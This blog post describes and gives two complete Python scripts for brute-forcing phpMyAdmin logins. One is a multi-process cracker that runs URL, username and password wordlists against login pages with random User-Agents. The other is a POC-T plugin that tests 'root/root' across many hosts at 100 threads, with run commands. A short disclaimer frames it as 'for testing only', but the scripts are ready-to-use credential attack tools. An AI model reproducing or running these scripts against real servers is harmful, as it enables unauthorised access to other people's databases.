banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel

Python multiprocessing & multithreading brute force attack on phpMyAdmin weak passwords

Cause of the Incident#

This code is for testing purposes only. The author is not responsible for any consequences resulting from its use!

The website of the great test404 has also been shut down, and his phpMyAdmin multi-threaded batch cracking tool was last updated to v2.3.

However, it is not very useful:

image

The code found online is not very useful, so I wrote one myself.

Some Explanations#

Core Code for Verification#

I found many articles online and discovered that the core part is to check for unique keywords in the login page after sending the constructed username and password requests.

For example, the script written by the great bypass previously checked the login_form field:

image

There are also checks for the pma_password field:

image

Some even check for phpMyAdmin is more friendly with a, which cannot be detected on both the correct and incorrect password pages:

image

After looking around, I still feel that the article on the experience box this article looks more reliable (although it also becomes less reliable later).

The core implementation method is to use the requests library with the session() method to maintain the session, obtaining the session id and the current token.

Then, add the username and password and post it out, ensuring that the id and token do not change during the sending process.

Command Line Parameter Settings#

This is my first time adding parameters when writing functional scripts, although this parameter is optional.

I added a -p option to mount a dictionary. There are generally three famous methods for setting command line parameters:

  1. sys.argv + getopt

This is just simple string separation, with no technical content:

image

  1. argparse

Recommended by many people, I found it quite useful.

image

Recommended Articles

  1. click

Click is an excellent open-source project developed by the Flask team, pallets. It encapsulates a lot of methods for developing command-line tools, allowing developers to focus solely on functionality implementation. This is a third-party library specifically designed for command-line use, and it is a very famous Python command-line module.

image

It uses decorators, which looked a bit daunting, so I didn't use it.

About Multi-Threading / Multi-Processing#

Liao Xuefeng's explanation about multi-threading not effectively utilizing CPU explanation:

Python threads are real threads, but when the interpreter executes code, there is a GIL lock: Global Interpreter Lock. Any Python thread must first acquire the GIL lock before executing, and after executing 100 bytes of bytecode, the interpreter automatically releases the GIL lock to allow other threads a chance to execute. This GIL global lock effectively locks all threads' execution code, so multi-threading in Python can only execute alternately. Even if 100 threads run on a 100-core CPU, only one core can be utilized.

GIL is a historical legacy issue in the design of the Python interpreter. The interpreter we usually use is the official implementation, CPython. To truly utilize multiple cores, one would have to rewrite an interpreter without GIL.

Therefore, in Python, multi-threading can be used, but do not expect to effectively utilize multiple cores. If you must utilize multiple cores through multi-threading, it can only be achieved through C extensions, but this would lose the simplicity and ease of use that Python offers.

However, there is no need to worry too much. Although Python cannot utilize multi-threading to implement multi-core tasks, it can achieve multi-core tasks through multi-processing. Multiple Python processes have their own independent GIL locks and do not interfere with each other.

In simple terms, if Python wants to utilize multiple cores, it can only use multi-processing.

In this article comparing multi-threading and multi-processing: Efficiency Comparison Experiment of Single Thread, Multi-Thread, and Multi-Process in Python, a conclusion can be drawn:

Multi-threading performs significantly worse than single-thread linear execution in CPU-intensive operations, but for network requests, which involve blocking threads, the advantages of multi-threading become very evident.
Multi-processing can demonstrate performance advantages in both CPU-intensive and IO-intensive as well as network request-intensive (operations that frequently cause thread blocking). However, in operations similar to network request intensity, it is not much different from multi-threading, but it consumes more CPU and other resources. Therefore, in such cases, we can choose multi-threading for execution.

In my implementation process, it can be summarized in one sentence:

Multi-threading and multi-processing have similar efficiency, but multi-processing is very noticeable in CPU resource consumption.

Complete Code for Multi-Processing#

Here, I have written a multi-processing version of the python phpmyadmin cracking script. The complete code is as follows:

#!/usr/bin/env/python
# -*- coding: utf-8 -*-
'''
@author: soapffz
@function: Multi-Process Cracking of phpMyAdmin Passwords (Supports Dictionary Mounting)
@time: 2019-12-28
'''

import requests
import os
from multiprocessing.pool import Pool
import time
import sys
import argparse
from fake_useragent import UserAgent
import re
import timeit


class multi_phpmyadmin_verification:
    def __init__(self):
        args = self.argparse(sys.argv[1:])
        if not args.p:
            self.passwd_l = open("password.txt").read().splitlines()
        elif not os.path.exists(args.p) or not os.path.isfile(args.p):
            print("path does not exist, quit")
            exit(0)
        else:
            self.passwd_l = args.p
        os.chdir(os.path.dirname(os.path.abspath(__file__)))
        self.urls_l = open("url.txt").read().splitlines()
        self.username_l = open("username.txt").read().splitlines()
        self.multi_thread()

    def argparse(self, argv):
        # Parsing parameters
        parser = argparse.ArgumentParser()  # Create a parse object
        parser.add_argument(
            "-p", type=str, metavar="dic_path", help="Dictionary path")
        return parser.parse_args(argv)

    def multi_thread(self):
        ua = UserAgent()  # Used to generate User-Agent
        self.headers = {"User-Agent": ua.random}  # Get a random User-Agent
        pool = Pool()
        for url in self.urls_l:
            for username in self.username_l:
                for passwd in self.passwd_l:
                    pool.apply_async(self.verify, args=(
                        url, username, passwd,))
        pool.close()
        pool.join()

    def verify(self, url, username, passwd):
        time.sleep(0.01)
        print("\r Current url:{},Current username:{},Current password:{}".format(
            url, username, passwd), end="")
        # Use the \ r parameter to refresh the current line output
        session = requests.session()
        r1 = session.get(url)
        if r1.status_code != 200:
            return
        session_id = re.findall(r'phpMyAdmin=(.*?);', r1.headers['Set-Cookie'])
        token = list(re.compile(
            r'name=\"token\" value=\"(.*?)\"').findall(r1.text))[0]
        payload = {"set_session": session_id, "pma_username": username,
                   "pma_password": passwd, "server": "1", "target": "index.php", "token": token}
        r2 = session.post(url, data=payload,
                          allow_redirects=False, headers=self.headers)
        if r2.status_code == 302:
            print("\n Succeeded!!!url:{},username:{},password:{}".format(
                url, username, passwd))


if __name__ == "__main__":
    start_time = timeit.default_timer()
    multi_phpmyadmin_verification()
    end_time = timeit.default_timer()
    print("\n Program execution finished, total time:{}".format(end_time-start_time))

Usage:

  • Create url.txt, username.txt, and password.txt in the same directory as the code, and write the corresponding url, usernames, and passwords to be cracked.
  • Install these libraries with pip install:
requests
multiprocessing
argparse
fake_useragent
timeit
  • Run the code with python phpmyadmin.py, you can add a -p parameter followed by the path to the dictionary.

The running effect is as follows:

image

cpu usage is noticeable:

image

The process pool is automatically set based on your cpu count. If you find the usage too high, you can manually specify the desired value in the parentheses of pool = Pool(); the maximum can only be your cpu core count, and reducing it slightly will prevent full CPU usage.

Multi-Threaded Version#

[Updated on 2020-02-12]

You can use the POC-T framework to manage multi-threading. For details, refer to github.

Save the following code as phpmyadmin-weakpass.py in the script folder of POC-T:

# -*- coding: utf-8 -*-
import requests
import re


def poc(url_dict):
    try:
        session = requests.session()
        req = session.get(url_dict)
        if req.status_code == 200:
            session_id = re.findall(
                r'phpMyAdmin=(.*?);', req.headers['Set-Cookie'])
            token = list(re.compile(
                r'name=\"token\" value=\"(.*?)\"').findall(req.text))[0]
            headers = {"Upgrade-Insecure-Requests": "1",
                       "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36 Edg/80.0.361.50", "Connection": "close"}
            paramsPost = {"set_session": session_id, "pma_username": "root",
                          "pma_password": "root", "server": "1", "target": "index.php", "token": token}
            r2 = session.post(url_dict, data=paramsPost,
                              allow_redirects=False, headers=headers)
            if r2.status_code == 302:
                return url_dict
    except:
        return False

Usage as follows:

python POC-T.py -s phpmyadmin-weakpass -t 100 -iF urls.txt -o first.txt

The effect is as follows:

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.